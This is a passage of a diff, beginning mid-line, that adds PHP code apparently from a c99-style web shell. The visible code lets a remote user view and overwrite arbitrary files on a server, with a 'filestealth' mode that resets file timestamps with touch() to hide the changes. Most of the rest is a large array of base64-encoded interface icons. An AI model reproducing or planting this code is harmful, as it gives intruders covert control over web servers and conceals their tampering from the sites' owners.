width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>"; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "<b>Can't write to file!</b>";} + else + { + echo "<b>Saved!</b>"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; + } + elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} + else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} + } +} +} +else +{ + @ob_clean(); + $images = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". 
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". 
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", +"small_unk"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". 
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". +"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". +"yAsokBkQADs=", +"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". +"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", +"sort_asc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", +"up"=> +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", +"write"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". 
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"ext_asp"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", +"ext_mp3"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_avi"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", +"ext_cgi"=> +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". +"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". +"RYtMAgEAOw==", +"ext_cmd"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_cpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". 
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". +"Eq7YrLDE7a4SADs=", +"ext_ini"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". +"SnEjgPVarHEHgrB43JvszsQEADs=", +"ext_diz"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". +"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". +"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". +"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". +"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". +"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". +"Ow==", +"ext_doc"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". +"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". 
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", +"ext_exe"=> +"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". +"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". +"xhIAOw==", +"ext_h"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". +"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". +"Wq/NknbbSgAAOw==", +"ext_hpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". +"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". +"UqUagnbLdZa+YFcCADs=", +"ext_htaccess"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". +"AAA7", +"ext_html"=> +"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". +"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". +"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". +"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". +"ADs=", +"ext_jpg"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". 